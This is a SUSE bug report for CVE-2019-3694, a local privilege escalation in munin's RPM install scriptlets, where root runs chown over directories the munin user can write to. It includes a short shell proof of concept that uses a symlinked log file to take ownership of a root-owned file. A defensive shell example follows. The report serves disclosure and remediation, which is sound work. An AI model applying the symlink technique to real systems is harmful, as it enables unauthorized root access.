Bug 1155078 - (CVE-2019-3694) VUL-0: CVE-2019-3694: munin: LPE from munin to root
Status: NEW
Classification: Novell Products
Product: SUSE Security Incidents
Component: Audits
Priority: P3 - Medium, Severity: Normal
Assigned To: Wolfgang Rosenauer
Security Team bot
https://smash.suse.de/issue/245791/
Blocks: 1154062
Reported: 2019-10-25 09:16 UTC by Johannes Segitz
Modified: 2021-06-23 11:51 UTC (History)
Description Johannes Segitz 2019-10-25 09:16:45 UTC
%post
chown -R munin:munin %{htmldir}
chown -R munin:munin %{dbdir}
chmod 755 %{dbdir}
touch %{logdir}/munin-graph.log %{logdir}/munin-html.log %{logdir}/munin-nagios.log %{logdir}/munin-limits.log %{logdir}/munin-update.log
chown munin:munin %{logdir}/*

allows LPE from munin to root. POC:
sh-5.0$ id
uid=463(munin) gid=462(munin) groups=462(munin)
sh-5.0$ pwd
/var/log/munin
sh-5.0$ rm munin-graph.log
sh-5.0$ ln -s /test/shadow munin-graph.log
sh-5.0$ ls -l
total 0
lrwxrwxrwx 1 munin munin 12 Oct 25 11:13 munin-graph.log -> /test/shadow
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-html.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-limits.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-nagios.log
-rw-r--r-- 1 root  root   0 Oct 25 11:12 munin-node.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-update.log
sh-5.0$ ls -l /test/
total 4
-r-------- 1 root root 1228 Oct 25 11:01 shadow

force reinstall of munin

sh-5.0$ ls -l /test/
total 4
-r-------- 1 munin munin 1228 Oct 25 11:13 shadow

The recursive chown calls can be exploited in a similar way with hardlinks on systems that have fs.protected_hardlinks=0.
Comment 1 Johannes Segitz 2019-10-25 11:58:39 UTC
Please use CVE-2019-3694 to track this. We can make this bug public at any time.
Comment 2 Johannes Segitz 2019-10-25 12:08:06 UTC
similar issues in %post node
%post node
if [ $1 = 1 ]; then
/usr/sbin/munin-node-configure --shell | sh
fi
chown -R munin:munin %{dbdir}
chmod 755 %{dbdir}
touch %{logdir}/munin-node.log
chown munin:munin %{logdir}/*
chown root:root %{logdir}/munin-node.log*
chown -R nobody:nobody %{dbdir}/plugin-state/* >/dev/null 2>&1
Comment 3 Johannes Segitz 2019-12-19 09:55:27 UTC
Can you please have a look? We want to make these issues public in the near future. Thank you.
Comment 4 Johannes Segitz 2020-01-24 10:40:25 UTC
Please submit for this
Comment 5 Johannes Segitz 2020-07-20 12:48:32 UTC
ping, please have a look
Comment 6 Wolfgang Rosenauer 2020-07-24 06:18:16 UTC
Do you have hints as to what the correct solution is?
Comment 7 Johannes Segitz 2020-07-24 08:21:50 UTC
(In reply to Wolfgang Rosenauer from comment #6)
So the easiest solution would be to remove these snippets and have rpm create the files with proper permissions.

For the log files that might be tricky, since you don't want to overwrite them upon update. Doesn't munin create them if they're missing? If not, you can use runuser to touch them as munin directly; that's safe.
Comment 8 Johannes Segitz 2021-06-23 11:51:40 UTC
Can you please submit for this? Feel free to reach out if you have questions.
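
The following shell functions are an added example, not part of the bug report or the munin package. `audit_logdir` lists the symlinked and multiply hard-linked entries that make a root-run `chown` over the log directory dangerous, and `create_logs_as` follows the comment 7 suggestion of touching log files as the service user. Function names are hypothetical and `runuser` from util-linux is assumed to be installed.

```shell
#!/bin/sh
# Added example; function names and paths are hypothetical, not munin's.

# audit_logdir DIR
# Print the entries directly under DIR that a root-run "chown user DIR/*"
# must not touch: symlinks (chown dereferences them by default) and regular
# files with more than one hard link (the inode may be another user's file
# when fs.protected_hardlinks=0). This is a point-in-time check for review
# or monitoring; it does not make a later root chown safe.
audit_logdir() {
    find "$1" -mindepth 1 -maxdepth 1 \
        \( -type l -o \( -type f -links +1 \) \) -print | sort
}

# create_logs_as USER DIR NAME...
# Create missing log files with USER's own privileges, so root never
# creates or chowns anything inside a directory USER can write to.
# Existing entries, including dangling symlinks, are left untouched.
create_logs_as() {
    user=$1 dir=$2
    shift 2
    for name in "$@"; do
        path=$dir/$name
        if [ -e "$path" ] || [ -L "$path" ]; then
            continue
        fi
        if [ "$(id -un)" = "$user" ]; then
            touch -- "$path"                        # already unprivileged
        else
            runuser -u "$user" -- touch -- "$path"  # scriptlet runs as root
        fi
    done
}
```

In a scriptlet this would replace the `touch` and `chown munin:munin %{logdir}/*` pair with a call such as `create_logs_as munin %{logdir} munin-update.log`.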